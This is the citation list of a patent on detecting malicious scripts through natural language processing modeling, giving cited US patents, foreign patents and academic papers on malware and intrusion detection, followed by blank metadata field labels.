10033753	Islam et al.	Jul 2018	B1
10033759	Kabra et al.	Jul 2018	B1
10050998	Singh	Aug 2018	B1
10068091	Aziz et al.	Sep 2018	B1
10075455	Zafar et al.	Sep 2018	B2
10083302	Paithane et al.	Sep 2018	B1
10084813	Eyada	Sep 2018	B2
10089461	Ha et al.	Oct 2018	B1
10097573	Aziz	Oct 2018	B1
10104102	Neumann	Oct 2018	B1
10108446	Steinberg et al.	Oct 2018	B1
10121000	Rivlin et al.	Nov 2018	B1
10122746	Manni et al.	Nov 2018	B1
10133863	Bu et al.	Nov 2018	B2
10133866	Kumar et al.	Nov 2018	B1
10146810	Shiffer et al.	Dec 2018	B2
10148693	Singh et al.	Dec 2018	B2
10165000	Aziz et al.	Dec 2018	B1
10169585	Pilipenko et al.	Jan 2019	B1
10176321	Abbasi et al.	Jan 2019	B2
10181029	Ismael et al.	Jan 2019	B1
10191861	Steinberg et al.	Jan 2019	B1
10192052	Singh et al.	Jan 2019	B1
10198574	Thioux et al.	Feb 2019	B1
10200384	Mushtaq et al.	Feb 2019	B1
10210329	Malik et al.	Feb 2019	B1
10216927	Steinberg	Feb 2019	B1
10218740	Mesdaq et al.	Feb 2019	B1
10242185	Goradia	Mar 2019	B1
20010005889	Albrecht	Jun 2001	A1
20010047326	Broadbent et al.	Nov 2001	A1
20020018903	Kokubo et al.	Feb 2002	A1
20020038430	Edwards et al.	Mar 2002	A1
20020091819	Melchione et al.	Jul 2002	A1
20020095607	Lin-Hendel	Jul 2002	A1
20020116627	Tarbotton et al.	Aug 2002	A1
20020144156	Copeland	Oct 2002	A1
20020162015	Tang	Oct 2002	A1
20020166063	Lachman et al.	Nov 2002	A1
20020169952	DiSanto et al.	Nov 2002	A1
20020184528	Shevenell et al.	Dec 2002	A1
20020188887	Largman et al.	Dec 2002	A1
20020194490	Halperin et al.	Dec 2002	A1
20030021728	Sharpe et al.	Jan 2003	A1
20030074578	Ford et al.	Apr 2003	A1
20030084318	Schertz	May 2003	A1
20030101381	Mateev et al.	May 2003	A1
20030115483	Liang	Jun 2003	A1
20030188190	Aaron et al.	Oct 2003	A1
20030191957	Hypponen et al.	Oct 2003	A1
20030200460	Morota et al.	Oct 2003	A1
20030212902	van der Made	Nov 2003	A1
20030229801	Kouznetsov et al.	Dec 2003	A1
20030237000	Denton et al.	Dec 2003	A1
20040003323	Bennett et al.	Jan 2004	A1
20040006473	Mills et al.	Jan 2004	A1
20040015712	Szor	Jan 2004	A1
20040019832	Arnold et al.	Jan 2004	A1
20040047356	Bauer	Mar 2004	A1
20040083408	Spiegel et al.	Apr 2004	A1
20040088581	Brawn et al.	May 2004	A1
20040093513	Cantrell et al.	May 2004	A1
20040111531	Staniford et al.	Jun 2004	A1
20040117478	Triulzi et al.	Jun 2004	A1
20040117624	Brandt et al.	Jun 2004	A1
20040128355	Chao et al.	Jul 2004	A1
20040165588	Pandya	Aug 2004	A1
20040236963	Danford et al.	Nov 2004	A1
20040243349	Greifeneder et al.	Dec 2004	A1
20040249911	Alkhatib et al.	Dec 2004	A1
20040255161	Cavanaugh	Dec 2004	A1
20040268147	Wiederin et al.	Dec 2004	A1
20050005159	Oliphant	Jan 2005	A1
20050021740	Bar et al.	Jan 2005	A1
20050033960	Vialen et al.	Feb 2005	A1
20050033989	Poletto et al.	Feb 2005	A1
20050050148	Mohammadioun et al.	Mar 2005	A1
20050086523	Zimmer et al.	Apr 2005	A1
20050091513	Mitomo et al.	Apr 2005	A1
20050091533	Omote et al.	Apr 2005	A1
20050091652	Ross et al.	Apr 2005	A1
20050108562	Khazan et al.	May 2005	A1
20050114663	Cornell et al.	May 2005	A1
20050125195	Brendel	Jun 2005	A1
20050149726	Joshi et al.	Jul 2005	A1
20050157662	Bingham et al.	Jul 2005	A1
20050183143	Anderholm et al.	Aug 2005	A1
20050201297	Peikari	Sep 2005	A1
20050210533	Copeland et al.	Sep 2005	A1
20050238005	Chen et al.	Oct 2005	A1
20050240781	Gassoway	Oct 2005	A1
20050262562	Gassoway	Nov 2005	A1
20050265331	Stolfo	Dec 2005	A1
20050283839	Cowburn	Dec 2005	A1
20060010495	Cohen et al.	Jan 2006	A1
20060015416	Hoffman et al.	Jan 2006	A1
20060015715	Anderson	Jan 2006	A1
20060015747	Van de Ven	Jan 2006	A1
20060021029	Brickell et al.	Jan 2006	A1
20060021054	Costa et al.	Jan 2006	A1
20060031476	Mathes et al.	Feb 2006	A1
20060047665	Neil	Mar 2006	A1
20060070130	Costea et al.	Mar 2006	A1
20060075496	Carpenter et al.	Apr 2006	A1
20060095968	Portolani et al.	May 2006	A1
20060101516	Sudaharan et al.	May 2006	A1
20060101517	Banzhof et al.	May 2006	A1
20060117385	Mester et al.	Jun 2006	A1
20060123477	Raghavan et al.	Jun 2006	A1
20060143709	Brooks et al.	Jun 2006	A1
20060150249	Gassen et al.	Jul 2006	A1
20060161983	Cothrell et al.	Jul 2006	A1
20060161987	Levy-Yurista	Jul 2006	A1
20060161989	Reshef et al.	Jul 2006	A1
20060164199	Gilde et al.	Jul 2006	A1
20060173992	Weber et al.	Aug 2006	A1
20060179147	Tran et al.	Aug 2006	A1
20060184632	Marino et al.	Aug 2006	A1
20060191010	Benjamin	Aug 2006	A1
20060221956	Narayan et al.	Oct 2006	A1
20060236393	Kramer et al.	Oct 2006	A1
20060242709	Seinfeld et al.	Oct 2006	A1
20060248519	Jaeger et al.	Nov 2006	A1
20060248582	Panjwani et al.	Nov 2006	A1
20060251104	Koga	Nov 2006	A1
20060288417	Bookbinder et al.	Dec 2006	A1
20070006288	Mayfield et al.	Jan 2007	A1
20070006313	Porras et al.	Jan 2007	A1
20070011174	Takaragi et al.	Jan 2007	A1
20070016951	Piccard et al.	Jan 2007	A1
20070019286	Kikuchi	Jan 2007	A1
20070033645	Jones	Feb 2007	A1
20070038943	FitzGerald et al.	Feb 2007	A1
20070064689	Shin et al.	Mar 2007	A1
20070074169	Chess et al.	Mar 2007	A1
20070094730	Bhikkaji et al.	Apr 2007	A1
20070101435	Konanka et al.	May 2007	A1
20070128855	Cho et al.	Jun 2007	A1
20070142030	Sinha et al.	Jun 2007	A1
20070143827	Nicodemus et al.	Jun 2007	A1
20070156895	Vuong	Jul 2007	A1
20070157180	Tillmann et al.	Jul 2007	A1
20070157306	Elrod et al.	Jul 2007	A1
20070168988	Eisner et al.	Jul 2007	A1
20070171824	Ruello et al.	Jul 2007	A1
20070174915	Gribble et al.	Jul 2007	A1
20070192500	Lum	Aug 2007	A1
20070192858	Lum	Aug 2007	A1
20070198275	Malden et al.	Aug 2007	A1
20070208822	Wang et al.	Sep 2007	A1
20070220607	Sprosts et al.	Sep 2007	A1
20070240218	Tuvell et al.	Oct 2007	A1
20070240219	Tuvell et al.	Oct 2007	A1
20070240220	Tuvell et al.	Oct 2007	A1
20070240222	Tuvell et al.	Oct 2007	A1
20070250930	Aziz et al.	Oct 2007	A1
20070256132	Oliphant	Nov 2007	A2
20070271446	Nakamura	Nov 2007	A1
20080005782	Aziz	Jan 2008	A1
20080018122	Zierler et al.	Jan 2008	A1
20080028463	Dagon et al.	Jan 2008	A1
20080040710	Chiriac	Feb 2008	A1
20080046781	Childs et al.	Feb 2008	A1
20080066179	Liu	Mar 2008	A1
20080072326	Danford et al.	Mar 2008	A1
20080077793	Tan et al.	Mar 2008	A1
20080080518	Hoeflin et al.	Apr 2008	A1
20080086720	Lekel	Apr 2008	A1
20080098476	Syversen	Apr 2008	A1
20080120722	Sima et al.	May 2008	A1
20080134178	Fitzgerald et al.	Jun 2008	A1
20080134334	Kim et al.	Jun 2008	A1
20080141376	Clausen et al.	Jun 2008	A1
20080184367	McMillan et al.	Jul 2008	A1
20080184373	Traut et al.	Jul 2008	A1
20080189787	Arnold et al.	Aug 2008	A1
20080201778	Guo et al.	Aug 2008	A1
20080209557	Herley et al.	Aug 2008	A1
20080215742	Goldszmidt et al.	Sep 2008	A1
20080222729	Chen et al.	Sep 2008	A1
20080263665	Ma et al.	Oct 2008	A1
20080295172	Bohacek	Nov 2008	A1
20080301810	Lehane et al.	Dec 2008	A1
20080307524	Singh et al.	Dec 2008	A1
20080313738	Enderby	Dec 2008	A1
20080320594	Jiang	Dec 2008	A1
20090003317	Kasralikar et al.	Jan 2009	A1
20090007100	Field et al.	Jan 2009	A1
20090013408	Schipka	Jan 2009	A1
20090031423	Liu et al.	Jan 2009	A1
20090036111	Danford et al.	Feb 2009	A1
20090037835	Goldman	Feb 2009	A1
20090044024	Oberheide et al.	Feb 2009	A1
20090044274	Budko et al.	Feb 2009	A1
20090064332	Porras et al.	Mar 2009	A1
20090077666	Chen et al.	Mar 2009	A1
20090083369	Marmor	Mar 2009	A1
20090083855	Apap et al.	Mar 2009	A1
20090089879	Wang et al.	Apr 2009	A1
20090094697	Provos et al.	Apr 2009	A1
20090113425	Ports et al.	Apr 2009	A1
20090125976	Wassermann et al.	May 2009	A1
20090126015	Monastyrsky et al.	May 2009	A1
20090126016	Sobko et al.	May 2009	A1
20090133125	Choi et al.	May 2009	A1
20090144823	Lamastra et al.	Jun 2009	A1
20090158430	Borders	Jun 2009	A1
20090172815	Gu et al.	Jul 2009	A1
20090187992	Poston	Jul 2009	A1
20090193293	Stolfo et al.	Jul 2009	A1
20090198651	Shiffer et al.	Aug 2009	A1
20090198670	Shiffer et al.	Aug 2009	A1
20090198689	Frazier et al.	Aug 2009	A1
20090199274	Frazier et al.	Aug 2009	A1
20090199296	Xie et al.	Aug 2009	A1
20090228233	Anderson et al.	Sep 2009	A1
20090241187	Troyansky	Sep 2009	A1
20090241190	Todd et al.	Sep 2009	A1
20090265692	Godefroid et al.	Oct 2009	A1
20090271867	Zhang	Oct 2009	A1
20090300415	Zhang et al.	Dec 2009	A1
20090300761	Park et al.	Dec 2009	A1
20090328185	Berg et al.	Dec 2009	A1
20090328221	Blumfield et al.	Dec 2009	A1
20100005146	Drako et al.	Jan 2010	A1
20100011205	McKenna	Jan 2010	A1
20100017546	Poo et al.	Jan 2010	A1
20100030996	Butler, II	Feb 2010	A1
20100031353	Thomas et al.	Feb 2010	A1
20100037314	Perdisci et al.	Feb 2010	A1
20100043073	Kuwamura	Feb 2010	A1
20100054278	Stolfo et al.	Mar 2010	A1
20100058474	Hicks	Mar 2010	A1
20100064044	Nonoyama	Mar 2010	A1
20100077481	Polyakov et al.	Mar 2010	A1
20100083376	Pereira et al.	Apr 2010	A1
20100115621	Staniford et al.	May 2010	A1
20100132038	Zaitsev	May 2010	A1
20100154056	Smith et al.	Jun 2010	A1
20100180344	Malyshev et al.	Jul 2010	A1
20100192223	Ismael et al.	Jul 2010	A1
20100220863	Dupaquis et al.	Sep 2010	A1
20100235831	Dittmer	Sep 2010	A1
20100251104	Massand	Sep 2010	A1
20100281102	Chinta et al.	Nov 2010	A1
20100281541	Stolfo et al.	Nov 2010	A1
20100281542	Stolfo et al.	Nov 2010	A1
20100287260	Peterson et al.	Nov 2010	A1
20100299754	Amit et al.	Nov 2010	A1
20100306173	Frank	Dec 2010	A1
20110004737	Greenebaum	Jan 2011	A1
20110025504	Lyon et al.	Feb 2011	A1
20110041179	St Hlberg	Feb 2011	A1
20110047594	Mahaffey et al.	Feb 2011	A1
20110047620	Mahaffey et al.	Feb 2011	A1
20110055907	Narasimhan et al.	Mar 2011	A1
20110078794	Manni et al.	Mar 2011	A1
20110093951	Aziz	Apr 2011	A1
20110099620	Stavrou et al.	Apr 2011	A1
20110099633	Aziz	Apr 2011	A1
20110099635	Silberman et al.	Apr 2011	A1
20110113231	Kaminsky	May 2011	A1
20110145918	Jung et al.	Jun 2011	A1
20110145920	Mahaffey et al.	Jun 2011	A1
20110145934	Abramovici et al.	Jun 2011	A1
20110167493	Song et al.	Jul 2011	A1
20110167494	Bowen et al.	Jul 2011	A1
20110173213	Frazier et al.	Jul 2011	A1
20110173460	Ito et al.	Jul 2011	A1
20110219449	St. Neitzel et al.	Sep 2011	A1
20110219450	McDougal et al.	Sep 2011	A1
20110225624	Sawhney et al.	Sep 2011	A1
20110225655	Niemela et al.	Sep 2011	A1
20110247072	Staniford et al.	Oct 2011	A1
20110265182	Peinado et al.	Oct 2011	A1
20110289582	Kejriwal et al.	Nov 2011	A1
20110302587	Nishikawa et al.	Dec 2011	A1
20110307954	Melnik et al.	Dec 2011	A1
20110307955	Kaplan et al.	Dec 2011	A1
20110307956	Yermakov et al.	Dec 2011	A1
20110314546	Aziz et al.	Dec 2011	A1
20120023593	Puder et al.	Jan 2012	A1
20120054869	Yen et al.	Mar 2012	A1
20120066698	Yanoo	Mar 2012	A1
20120079596	Thomas et al.	Mar 2012	A1
20120084859	Radinsky et al.	Apr 2012	A1
20120096553	Srivastava et al.	Apr 2012	A1
20120110667	Zubrilin et al.	May 2012	A1
20120117652	Manni et al.	May 2012	A1
20120121154	Xue et al.	May 2012	A1
20120124426	Maybee et al.	May 2012	A1
20120174186	Aziz et al.	Jul 2012	A1
20120174196	Bhogavilli et al.	Jul 2012	A1
20120174218	McCoy et al.	Jul 2012	A1
20120198279	Schroeder	Aug 2012	A1
20120210423	Friedrichs et al.	Aug 2012	A1
20120222121	Staniford et al.	Aug 2012	A1
20120255015	Sahita et al.	Oct 2012	A1
20120255017	Sallam	Oct 2012	A1
20120260342	Dube et al.	Oct 2012	A1
20120266244	Green et al.	Oct 2012	A1
20120278886	Luna	Nov 2012	A1
20120297489	Dequevy	Nov 2012	A1
20120330801	McDougal et al.	Dec 2012	A1
20120331553	Aziz et al.	Dec 2012	A1
20130014259	Gribble et al.	Jan 2013	A1
20130036472	Aziz	Feb 2013	A1
20130047257	Aziz	Feb 2013	A1
20130074185	McDougal et al.	Mar 2013	A1
20130086684	Mohler	Apr 2013	A1
20130097699	Balupari et al.	Apr 2013	A1
20130097706	Titonis et al.	Apr 2013	A1
20130111587	Goel et al.	May 2013	A1
20130117852	Stute	May 2013	A1
20130117855	Kim et al.	May 2013	A1
20130139264	Brinkley et al.	May 2013	A1
20130160125	Likhachev et al.	Jun 2013	A1
20130160127	Jeong et al.	Jun 2013	A1
20130160130	Mendelev et al.	Jun 2013	A1
20130160131	Madou et al.	Jun 2013	A1
20130167236	Sick	Jun 2013	A1
20130174214	Duncan	Jul 2013	A1
20130185789	Hagiwara et al.	Jul 2013	A1
20130185795	Winn et al.	Jul 2013	A1
20130185798	Saunders et al.	Jul 2013	A1
20130191915	Antonakakis et al.	Jul 2013	A1
20130196649	Paddon et al.	Aug 2013	A1
20130227691	Aziz et al.	Aug 2013	A1
20130246370	Bartram et al.	Sep 2013	A1
20130247186	LeMasters	Sep 2013	A1
20130263260	Mahaffey et al.	Oct 2013	A1
20130291109	Staniford et al.	Oct 2013	A1
20130298243	Kumar et al.	Nov 2013	A1
20130318038	Shiffer et al.	Nov 2013	A1
20130318073	Shiffer et al.	Nov 2013	A1
20130325791	Sniffer et al.	Dec 2013	A1
20130325792	Shiffer et al.	Dec 2013	A1
20130325871	Shiffer et al.	Dec 2013	A1
20130325872	Shiffer et al.	Dec 2013	A1
20140032875	Butler	Jan 2014	A1
20140053260	Gupta et al.	Feb 2014	A1
20140053261	Gupta et al.	Feb 2014	A1
20140130158	Wang et al.	May 2014	A1
20140137180	Lukacs et al.	May 2014	A1
20140164352	Denninghoff	Jun 2014	A1
20140169762	Ryu	Jun 2014	A1
20140179360	Jackson et al.	Jun 2014	A1
20140181131	Ross	Jun 2014	A1
20140189687	Jung et al.	Jul 2014	A1
20140189866	Shiffer et al.	Jul 2014	A1
20140189882	Jung et al.	Jul 2014	A1
20140237600	Silberman et al.	Aug 2014	A1
20140280245	Wilson	Sep 2014	A1
20140283037	Sikorski et al.	Sep 2014	A1
20140283063	Thompson et al.	Sep 2014	A1
20140328204	Klotsche et al.	Nov 2014	A1
20140337836	Ismael	Nov 2014	A1
20140344926	Cunningham et al.	Nov 2014	A1
20140351935	Shao et al.	Nov 2014	A1
20140380473	Bu et al.	Dec 2014	A1
20140380474	Paithane et al.	Dec 2014	A1
20150007312	Pidathala et al.	Jan 2015	A1
20150096022	Vincent et al.	Apr 2015	A1
20150096023	Mesdaq et al.	Apr 2015	A1
20150096024	Haq et al.	Apr 2015	A1
20150096025	Ismael	Apr 2015	A1
20150180886	Staniford et al.	Jun 2015	A1
20150186645	Aziz et al.	Jul 2015	A1
20150199513	Ismael et al.	Jul 2015	A1
20150199531	Ismael et al.	Jul 2015	A1
20150199532	Ismael	Jul 2015	A1
20150220735	Paithane et al.	Aug 2015	A1
20150372980	Eyada	Dec 2015	A1
20160004869	Ismael et al.	Jan 2016	A1
20160006756	Ismael et al.	Jan 2016	A1
20160044000	Cunningham	Feb 2016	A1
20160094572	Tyagi	Mar 2016	A1
20160127393	Aziz et al.	May 2016	A1
20160191547	Zafar et al.	Jun 2016	A1
20160191550	Ismael et al.	Jun 2016	A1
20160261612	Mesdaq et al.	Sep 2016	A1
20160285914	Singh et al.	Sep 2016	A1
20160301703	Aziz	Oct 2016	A1
20160335110	Paithane et al.	Nov 2016	A1
20170083703	Abbasi et al.	Mar 2017	A1
20180013770	Ismael	Jan 2018	A1
20180048660	Paithane et al.	Feb 2018	A1
20180121316	Ismael et al.	May 2018	A1
20180288077	Siddiqui et al.	Oct 2018	A1

Foreign Referenced Citations (11)

Number	Date	Country
2439806	Jan 2008	GB
2490431	Oct 2012	GB
0206928	Jan 2002	WO
0223805	Mar 2002	WO
2007117636	Oct 2007	WO
2008041950	Apr 2008	WO
2011084431	Jul 2011	WO
2011112348	Sep 2011	WO
2012075336	Jun 2012	WO
2012145066	Oct 2012	WO
2013067505	May 2013	WO

Non-Patent Literature Citations (57)

Entry
Venezia, Paul , “NetDetector Captures Intrusions”, InfoWorld Issue 27, (“Venezia”), (Jul. 14, 2003).
Vladimir Getov: “Security as a Service in Smart Clouds—Opportunities and Concerns”, Computer Software and Applications Conference (COMPSAC), 2012 IEEE 36th Annual, IEEE, Jul. 16, 2012 (Jul. 16, 2012).
Wahid et al., Characterising the Evolution in Scanning Activity of Suspicious Hosts, Oct. 2009, Third International Conference on Network and System Security, pp. 344-350.
Whyte, et al., “DNS-Based Detection of Scanning Works in an Enterprise Network”, Proceedings of the 12th Annual Network and Distributed System Security Symposium, (Feb. 2005), 15 pages.
Williamson, Matthew M., “Throttling Viruses: Restricting Propagation to Defeat Malicious Mobile Code”, ACSAC Conference, Las Vegas, NV, USA, (Dec. 2002), pp. 1-9.
Yuhei Kawakoya et al: “Memory behavior-based automatic malware unpacking in stealth debugging environment”, Malicious and Unwanted Software (Malware), 2010 5th International Conference on, IEEE, Piscataway, NJ, USA, Oct. 19, 2010, pp. 39-46, XP031833827, ISBN:978-1-4244-8-9353-1.
Zhang et al., The Effects of Threading, Infection Time, and Multiple-Attacker Collaboration on Malware Propagation, Sep. 2009, IEEE 28th International Symposium on Reliable Distributed Systems, pp. 73-82.
“Mining Specification of Malicious Behavior”—Jha et al, UCSB, Sep. 2007 https://www.cs.ucsb.edu/about.chris/research/doc/esec07.sub.--mining.pdf-.
“Network Security: NetDetector—Network Intrusion Forensic System (NIFS) Whitepaper”, (“NetDetector Whitepaper”), (2003).
“When Virtual is Better Than Real”, IEEEXplore Digital Library, available at, http://ieeexplore.ieee.org/xpl/articleDetails.isp?reload=true&arnumbe- r=990073, (Dec. 7, 2013).
Abdullah, et al., Visualizing Network Data for Intrusion Detection, 2005 IEEE Workshop on Information Assurance and Security, pp. 100-108.
Adetoye, Adedayo , et al., “Network Intrusion Detection & Response System”, (“Adetoye”), (Sep. 2003).
Apostolopoulos, George; hassapis, Constantinos; “V-eM: A cluster of Virtual Machines for Robust, Detailed, and High-Performance Network Emulation”, 14th IEEE International Symposium on Modeling, Analysis, and Simulation of Computer and Telecommunication Systems, Sep. 11-14, 2006, pp. 117-126.
Aura, Tuomas, “Scanning electronic documents for personally identifiable information”, Proceedings of the 5th ACM workshop on Privacy in electronic society. ACM, 2006.
Baecher, “The Nepenthes Platform: An Efficient Approach to collect Malware”, Springer-verlag Berlin Heidelberg, (2006), pp. 165-184.
Bayer, et al., “Dynamic Analysis of Malicious Code”, J Comput Virol, Springer-Verlag, France., (2006), pp. 67-77.
Boubalos, Chris , “extracting syslog data out of raw pcap dumps, seclists.org, Honeypots mailing list archives”, available at http://seclists.org/honeypots/2003/q2/319 (“Boubalos”), (Jun. 5, 2003).
Chaudet, C. , et al., “Optimal Positioning of Active and Passive Monitoring Devices”, International Conference on Emerging Networking Experiments and Technologies, Proceedings of the 2005 ACM Conference on Emerging Network Experiment and Technology, CoNEXT '05, Toulousse, France, (Oct. 2005), pp. 71-82.
Chen, P. M. and Noble, B. D., “When Virtual is Better Than Real, Department of Electrical Engineering and Computer Science”, University of Michigan (“Chen”) (2001).
Cisco “Intrusion Prevention for the Cisco ASA 5500-x Series” Data Sheet (2012).
Cohen, M.I. , “PyFlag—An advanced network forensic framework”, Digital investigation 5, Elsevier, (2008), pp. S112-S120.
Costa, M. , et al., “Vigilante: End-to-End Containment of Internet Worms”, SOSP '05, Association for Computing Machinery, Inc., Brighton U.K., (Oct. 23-26, 2005).
Didier Stevens, “Malicious PDF Documents Explained”, Security & Privacy, IEEE, IEEE Service Center, Los Alamitos, CA, US, vol. 9, No. 1, Jan. 1, 2011, pp. 80-82, XP011329453, ISSN: 1540-7993, DOI: 10.1109/MSP.2011.14.
Distler, “Malware Analysis: An Introduction”, SANS Institute InfoSec Reading Room, SANS Institute, (2007).
Dunlap, George W. , et al., “ReVirt: Enabling Intrusion Analysis through Virtual-Machine Logging and Replay”, Proceeding of the 5th Symposium on Operating Systems Design and Implementation, USENIX Association, (“Dunlap”), (Dec. 9, 2002).
FireEye Malware Analysis & Exchange Network, Malware Protection System, FireEye Inc., 2010.
FireEye Malware Analysis, Modern Malware Forensics, FireEye Inc., 2010.
FireEye v.6.0 Security Target, pp. 1-35, Version 1.1, FireEye Inc., May 2011.
Goel, et al., Reconstructing System State for Intrusion Analysis, Apr. 2008 SIGOPS Operating Systems Review, vol. 42 Issue 3, pp. 21-28.
Gregg Keizer: “Microsoft's HoneyMonkeys Show Patching Windows Works”, Aug. 8, 2005, XP055143386, Retrieved from the Internet: URL:http://www.informationweek.com/microsofts-honeymonkeys-show-patching-windows-works/d/d-id/1035069? [retrieved on Jun. 1, 2016].
Heng Yin et al, Panorama: Capturing System-Wide Information Flow for Malware Detection and Analysis, Research Showcase © CMU, Carnegie Mellon University, 2007.
Hiroshi Shinotsuka, Malware Authors Using New Techniques to Evade Automated Threat Analysis Systems, Oct. 26, 2012, http://www.symantec.com/connect/blogs/, pp. 1-4.
Idika et al., A-Survey-of-Malware-Detection-Techniques, Feb. 2, 2007, Department of Computer Science, Purdue University.
Isohara, Takamasa, Keisuke Takemori, and Ayumu Kubota. “Kernel-based behavior analysis for android malware detection.” Computational intelligence and Security (CIS), 2011 Seventh International Conference on. IEEE, 2011.
Kaeo, Merike , “Designing Network Security”, (“Kaeo”), (Nov. 2003).
Kevin A Roundy et al: “Hybrid Analysis and Control of Malware”, Sep. 15, 2010, Recent Advances in Intrusion Detection, Springer Berlin Heidelberg, Berlin, Heidelberg, pp. 317-338, XP019150454 ISBN:978-3-642-15511-6.
Khaled Salah et al: “Using Cloud Computing to Implement a Security Overlay Network”, Security & Privacy, IEEE, IEEE Service Center, Los Alamitos, CA, US, vol. 11, No. 1, Jan. 1, 2013 (Jan. 1, 2013).
Kim, H. , et al., “Autograph: Toward Automated, Distributed Worm Signature Detection”, Proceedings of the 13th Usenix Security Symposium (Security 2004), San Diego, (Aug. 2004), pp. 271-286.
King, Samuel T., et al., “Operating System Support for Virtual Machines”, (“King”), (2003).
Kreibich, C. , et al., “Honeycomb-Creating Intrusion Detection Signatures Using Honeypots”, 2nd Workshop on Hot Topics in Networks (HotNets-11), Boston, USA, (2003).
Kristoff, J. , “Botnets, Detection and Mitigation: DNS-Based Techniques”, NU Security Day, (2005), 23 pages.
Lastline Labs, The Threat of Evasive Malware, Feb. 25, 2013, Lastline Labs, pp. 1-8.
Li et al., A VMM-Based System Call Interposition Framework for Program Monitoring, Dec. 2010, IEEE 16th International Conference on Parallel and Distributed Systems, pp. 706-711.
Lindorfer, Martina, Clemens Kolbitsch, and Paolo Milani Comparetti. “Detecting environment-sensitive malware.” Recent Advances in Intrusion Detection. Springer Berlin Heidelberg, 2011.
Marchette, David J., “Computer Intrusion Detection and Network Monitoring: A Statistical Viewpoint”, (“Marchette”), (2001).
Moore, D. , et al., “Internet Quarantine: Requirements for Containing Self-Propagating Code”, INFOCOM, vol. 3, (Mar. 30-Apr. 3, 2003), pp. 1901-1910.
Morales, Jose A., et al., ““Analyzing and exploiting network behaviors of malware.””, Security and Privacy in Communication Networks. Springer Berlin Heidelberg, 2010. 20-34.
Mori, Detecting Unknown Computer Viruses, 2004, Springer-Verlag Berlin Heidelberg.
Natvig, Kurt , “SANDBOXII: Internet”, Virus Bulletin Conference, (“Natvig”), (Sep. 2002).
NetBIOS Working Group. Protocol Standard for a NetBIOS Service on a TCP/UDP transport: Concepts and Methods. STD 19, RFC 1001, Mar. 1987.
Newsome, J. , et al., “Dynamic Taint Analysis for Automatic Detection, Analysis, and Signature Generation of Exploits on Commodity Software”, In Proceedings of the 12th Annual Network and Distributed System Security, Symposium (NDSS '05), (Feb. 2005).
Nojiri, D. , et al., “Cooperation Response Strategies for Large Scale Attack Mitigation”, DARPA Information Survivability Conference and Exposition, vol. 1, (Apr. 22-24, 2003), pp. 293-302.
Oberheide et al., CloudAV.sub.--N-Version Antivirus in the Network Cloud, 17th USENIX Security Symposium USENIX Security '08 Jul. 28-Aug. 1, 2008 San Jose, CA.
Reiner Sailer, Enriquillo Valdez, Trent Jaeger, Roonald Perez, Leendert van Doorn, John Linwood Griffin, Stefan Berger., sHype: Secure Hypervisor Appraoch to Trusted Virtualized Systems (Feb. 2, 2005) (“Sailer”).
Silicon Defense, “Worm Containment in the Internal Network”, (Mar. 2003), pp. 1-25.
Singh, S. , et al., “Automated Worm Fingerprinting”, Proceedings of the ACM/USENIX Symposium on Operating System Design and Implementation, San Francisco, California, (Dec. 2004).
Thomas H. Ptacek, and Timothy N. Newsham , “Insertion, Evasion, and Denial of Service: Eluding Network Intrusion Detection”, Secure Networks, (“Ptacek”), (Jan. 1998).

Provisional Applications (1)

	Number	Date	Country
	62650860	Mar 2018	US

System and method for detecting malicious scripts through natural language processing modeling

Information

Patent Number

Date Filed

Date Issued

Inventors

Original Assignees

Examiners

Agents

CPC

Field of Search

CPC

International Classifications

Term Extension